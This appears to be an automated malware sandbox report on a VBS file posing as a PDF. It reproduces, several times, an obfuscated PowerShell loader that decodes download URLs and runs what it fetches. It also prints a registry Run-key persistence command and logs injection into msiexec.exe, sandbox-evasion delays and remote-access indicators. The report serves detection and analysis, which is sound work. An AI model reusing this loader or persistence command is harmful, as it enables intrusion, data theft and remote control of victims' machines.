              Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. 
DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali.
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE7CEE00BD pushad ; iretd 4_2_00007FFE7CEE00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE7CFB7886 push edi; iretd 4_2_00007FFE7CFB790A
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key

              Hooking and other Techniques for Hiding and Protection

              Source: Possible double extension: pdf.vbsStatic PE information: Scanned_22C-6e24090516030.pdf.vbs
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Initial fileInitial file: Do While Glemselens.Status = 0 WScript.Sleep 100
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5297
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4598
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7509
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2096
              Source: C:\Windows\System32\wscript.exe TID: 7888Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7536Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 8100Thread sleep count: 3495 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 8100Thread sleep time: -10485000s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 8100Thread sleep count: 6497 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 8100Thread sleep time: -19491000s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
              Source: wscript.exe, 00000000.00000002.1352815477.0000018D17615000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wscript.exe, 00000000.00000003.1350699724.0000018D17618000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: wscript.exe, 00000000.00000003.1342843378.0000018D193D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1353129640.0000018D193F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1350898356.0000018D193F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1351557174.0000018D19432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1343039508.0000018D193F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341840153.0000018D19432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1353129640.0000018D19432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1351557174.0000018D193F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1343142980.0000018D19432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1350898356.0000018D19432000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000004.00000002.1472500787.00000229FE60A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: PING.EXE, 00000002.00000002.1347682734.00000258B9309000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
              Source: Yara match | File source: amsi64_7972.amsi.csv, type: OTHER
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7972, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7216, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3E80000
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. 
DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali.Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#semipoor radiculose hornuglen laminaterne cadesse freespac #>;$henkastet='splenetically35';<#kaskoforsikre bollix rdslens #>;$stepway=$sammentrdninger+$host.ui; function tuggery($cracks){if ($stepway) {$rupturable++;}$seerlike=$ordrebeholdningernes+$cracks.'length'-$rupturable; for( $pickaxes=4;$pickaxes -lt $seerlike;$pickaxes+=5){$undertrkkene=$pickaxes;$fascinationen+=$cracks[$pickaxes];$bronchoesophagoscopy='noomis';}$fascinationen;}function phonogramically($karaktermord){ . ($fritflue) ($karaktermord);}$finalismens=tuggery 'surmmpo aounsezallei,sykltra.l proa rep/spar ';$finalismens+=tuggery 'n ct5s ng. kar0deut ne (deliwydmyipaponbombdboreoregnwstansk tt acounvalvttabl lept1rere0fami.m al0 ps;unsc ha,nwaeroilyrinrefl6star4sca ;clip chylxfutu6li h4tax ; blr defarcryov q,i:tinc1re.i3 kod1stop.term0 .eo)sp.j fabugtranes.ltcdentk rinob ne/unde2si n0konk1kabi0hu.d0umbr1 agn0note1guri sndfautoisa,dranteecob fluckopa,ax van/ gtp1per.3sini1salm.sta 0l.ks ';$brokbinds=tuggery 'stafu.anksmonge habr unm-ste ah lkg t,oebedrnf.lutbedr ';$hematozoan=tuggery 'noeshbagetkoortrefepuransdisk:clei/krak/ sliw renwa,etwtekn. antgtnksr sluo decusublpvi.eroveri,apoaprogm hou.withcclaso jemra,e/sminmf.vraer,vnniddd drisbipecmandhbyzaapre uarnuvvicaier.vnin qifraasravemsyssedefl. 
disshemanlovlp rug> renhbuk tcheftrej.psands emi:verr/sple/oejnborrorkaktusub t sa audsd.ahorp.lurl sy /sor mhkkeaafg n etrdmi lsdivucheelhdisca tu ushawvafstinon nspkkiforvsfo mm.lageskru.ca bs revnbesppanel ';$dacha=tuggery ' shi>blue ';$fritflue=tuggery 'resai pineragsx ugg ';$dessinatren='solstraalehistoriers';$sygne='\sttefiskenes.tav';phonogramically (tuggery 'prod$ bolgsydkl.umaotratbbetaa spolbis.: elldtezciprsisa.bekstans absp proe hanccystiha,tf ngmitunnknonpa alot laiiambiolabonleukeboflrkonts syn2 kla4exci8ceph=chit$ungde l sn ftev non:ewerar vapsupepadu.dsataab ugtbefaatuft+g.da$cplbsautoyfritg wainadfrebg r ');phonogramically (tuggery 'br d$uratgrelalherbo u,hb yikato,ml h.k:canabopsirskibuslukgmonoeesqurfires ixesaffrca sv coniapatc buderist=komm$be yhmurdebewemeurhapigrtunciobadezsmaloforuadoornmeal. de,s en pexodl.eenihemithyal( agt$gangdpaniaschlc sathsjusafunk)t,im ');phonogramically (tuggery 'thro[flernheptecasttcaes. pe sk mmecardrstamvtilbihaanclns eadippdr.godramichronkbslt .limvar.a acknbe oaadelghed.esatcr nde]enke:ring: pr s kone u gclae,u snerkarii tretvejrysup p traruimoo saltkltroafsvcglucoepenlfjel tris=beha p ke[runonsweeetab.tv.nd.ambasindkeeva c mi.udestrbeslieuphtte,ly virpraadre ero.asctbr.rohyg c diao.epalf,sttgoniyhestp v eejobb]si.d:dkna:d tatja.bl,ukksse i1dich2olip ');$hematozoan=$brugerservice[0];$discriminatingness=(tuggery ' asd$ nteglu tl ecloantibs,rhafabrlf lk:retsg folrrygeuudren chadmil.lblemnsk,fs pho=coutnindieaporwuros-caseo rthbhannjreg east,c t it ggr presvid.ysolis ult bliecombm ste.mandnth.rest.ltsali.
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#semipoor radiculose hornuglen laminaterne cadesse freespac #>;$henkastet='splenetically35';<#kaskoforsikre bollix rdslens #>;$stepway=$sammentrdninger+$host.ui; function tuggery($cracks){if ($stepway) {$rupturable++;}$seerlike=$ordrebeholdningernes+$cracks.'length'-$rupturable; for( $pickaxes=4;$pickaxes -lt $seerlike;$pickaxes+=5){$undertrkkene=$pickaxes;$fascinationen+=$cracks[$pickaxes];$bronchoesophagoscopy='noomis';}$fascinationen;}function phonogramically($karaktermord){ . ($fritflue) ($karaktermord);}$finalismens=tuggery 'surmmpo aounsezallei,sykltra.l proa rep/spar ';$finalismens+=tuggery 'n ct5s ng. kar0deut ne (deliwydmyipaponbombdboreoregnwstansk tt acounvalvttabl lept1rere0fami.m al0 ps;unsc ha,nwaeroilyrinrefl6star4sca ;clip chylxfutu6li h4tax ; blr defarcryov q,i:tinc1re.i3 kod1stop.term0 .eo)sp.j fabugtranes.ltcdentk rinob ne/unde2si n0konk1kabi0hu.d0umbr1 agn0note1guri sndfautoisa,dranteecob fluckopa,ax van/ gtp1per.3sini1salm.sta 0l.ks ';$brokbinds=tuggery 'stafu.anksmonge habr unm-ste ah lkg t,oebedrnf.lutbedr ';$hematozoan=tuggery 'noeshbagetkoortrefepuransdisk:clei/krak/ sliw renwa,etwtekn. antgtnksr sluo decusublpvi.eroveri,apoaprogm hou.withcclaso jemra,e/sminmf.vraer,vnniddd drisbipecmandhbyzaapre uarnuvvicaier.vnin qifraasravemsyssedefl. 
disshemanlovlp rug> renhbuk tcheftrej.psands emi:verr/sple/oejnborrorkaktusub t sa audsd.ahorp.lurl sy /sor mhkkeaafg n etrdmi lsdivucheelhdisca tu ushawvafstinon nspkkiforvsfo mm.lageskru.ca bs revnbesppanel ';$dacha=tuggery ' shi>blue ';$fritflue=tuggery 'resai pineragsx ugg ';$dessinatren='solstraalehistoriers';$sygne='\sttefiskenes.tav';phonogramically (tuggery 'prod$ bolgsydkl.umaotratbbetaa spolbis.: elldtezciprsisa.bekstans absp proe hanccystiha,tf ngmitunnknonpa alot laiiambiolabonleukeboflrkonts syn2 kla4exci8ceph=chit$ungde l sn ftev non:ewerar vapsupepadu.dsataab ugtbefaatuft+g.da$cplbsautoyfritg wainadfrebg r ');phonogramically (tuggery 'br d$uratgrelalherbo u,hb yikato,ml h.k:canabopsirskibuslukgmonoeesqurfires ixesaffrca sv coniapatc buderist=komm$be yhmurdebewemeurhapigrtunciobadezsmaloforuadoornmeal. de,s en pexodl.eenihemithyal( agt$gangdpaniaschlc sathsjusafunk)t,im ');phonogramically (tuggery 'thro[flernheptecasttcaes. pe sk mmecardrstamvtilbihaanclns eadippdr.godramichronkbslt .limvar.a acknbe oaadelghed.esatcr nde]enke:ring: pr s kone u gclae,u snerkarii tretvejrysup p traruimoo saltkltroafsvcglucoepenlfjel tris=beha p ke[runonsweeetab.tv.nd.ambasindkeeva c mi.udestrbeslieuphtte,ly virpraadre ero.asctbr.rohyg c diao.epalf,sttgoniyhestp v eejobb]si.d:dkna:d tatja.bl,ukksse i1dich2olip ');$hematozoan=$brugerservice[0];$discriminatingness=(tuggery ' asd$ nteglu tl ecloantibs,rhafabrlf lk:retsg folrrygeuudren chadmil.lblemnsk,fs pho=coutnindieaporwuros-caseo rthbhannjreg east,c t it ggr presvid.ysolis ult bliecombm ste.mandnth.rest.ltsali.
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#semipoor radiculose hornuglen laminaterne cadesse freespac #>;$henkastet='splenetically35';<#kaskoforsikre bollix rdslens #>;$stepway=$sammentrdninger+$host.ui; function tuggery($cracks){if ($stepway) {$rupturable++;}$seerlike=$ordrebeholdningernes+$cracks.'length'-$rupturable; for( $pickaxes=4;$pickaxes -lt $seerlike;$pickaxes+=5){$undertrkkene=$pickaxes;$fascinationen+=$cracks[$pickaxes];$bronchoesophagoscopy='noomis';}$fascinationen;}function phonogramically($karaktermord){ . ($fritflue) ($karaktermord);}$finalismens=tuggery 'surmmpo aounsezallei,sykltra.l proa rep/spar ';$finalismens+=tuggery 'n ct5s ng. kar0deut ne (deliwydmyipaponbombdboreoregnwstansk tt acounvalvttabl lept1rere0fami.m al0 ps;unsc ha,nwaeroilyrinrefl6star4sca ;clip chylxfutu6li h4tax ; blr defarcryov q,i:tinc1re.i3 kod1stop.term0 .eo)sp.j fabugtranes.ltcdentk rinob ne/unde2si n0konk1kabi0hu.d0umbr1 agn0note1guri sndfautoisa,dranteecob fluckopa,ax van/ gtp1per.3sini1salm.sta 0l.ks ';$brokbinds=tuggery 'stafu.anksmonge habr unm-ste ah lkg t,oebedrnf.lutbedr ';$hematozoan=tuggery 'noeshbagetkoortrefepuransdisk:clei/krak/ sliw renwa,etwtekn. antgtnksr sluo decusublpvi.eroveri,apoaprogm hou.withcclaso jemra,e/sminmf.vraer,vnniddd drisbipecmandhbyzaapre uarnuvvicaier.vnin qifraasravemsyssedefl. 
disshemanlovlp rug> renhbuk tcheftrej.psands emi:verr/sple/oejnborrorkaktusub t sa audsd.ahorp.lurl sy /sor mhkkeaafg n etrdmi lsdivucheelhdisca tu ushawvafstinon nspkkiforvsfo mm.lageskru.ca bs revnbesppanel ';$dacha=tuggery ' shi>blue ';$fritflue=tuggery 'resai pineragsx ugg ';$dessinatren='solstraalehistoriers';$sygne='\sttefiskenes.tav';phonogramically (tuggery 'prod$ bolgsydkl.umaotratbbetaa spolbis.: elldtezciprsisa.bekstans absp proe hanccystiha,tf ngmitunnknonpa alot laiiambiolabonleukeboflrkonts syn2 kla4exci8ceph=chit$ungde l sn ftev non:ewerar vapsupepadu.dsataab ugtbefaatuft+g.da$cplbsautoyfritg wainadfrebg r ');phonogramically (tuggery 'br d$uratgrelalherbo u,hb yikato,ml h.k:canabopsirskibuslukgmonoeesqurfires ixesaffrca sv coniapatc buderist=komm$be yhmurdebewemeurhapigrtunciobadezsmaloforuadoornmeal. de,s en pexodl.eenihemithyal( agt$gangdpaniaschlc sathsjusafunk)t,im ');phonogramically (tuggery 'thro[flernheptecasttcaes. pe sk mmecardrstamvtilbihaanclns eadippdr.godramichronkbslt .limvar.a acknbe oaadelghed.esatcr nde]enke:ring: pr s kone u gclae,u snerkarii tretvejrysup p traruimoo saltkltroafsvcglucoepenlfjel tris=beha p ke[runonsweeetab.tv.nd.ambasindkeeva c mi.udestrbeslieuphtte,ly virpraadre ero.asctbr.rohyg c diao.epalf,sttgoniyhestp v eejobb]si.d:dkna:d tatja.bl,ukksse i1dich2olip ');$hematozoan=$brugerservice[0];$discriminatingness=(tuggery ' asd$ nteglu tl ecloantibs,rhafabrlf lk:retsg folrrygeuudren chadmil.lblemnsk,fs pho=coutnindieaporwuros-caseo rthbhannjreg east,c t it ggr presvid.ysolis ult bliecombm ste.mandnth.rest.ltsali.Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match | File source: 00000009.00000002.2629630958.0000000009B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000009.00000003.1938941786.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000009.00000002.2629630958.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000009.00000002.2629630958.0000000009AAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              Source: C:\Windows\SysWOW64\msiexec.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-K8KWVT
              Source: Yara match | File source: 00000009.00000002.2629630958.0000000009B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000009.00000003.1938941786.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
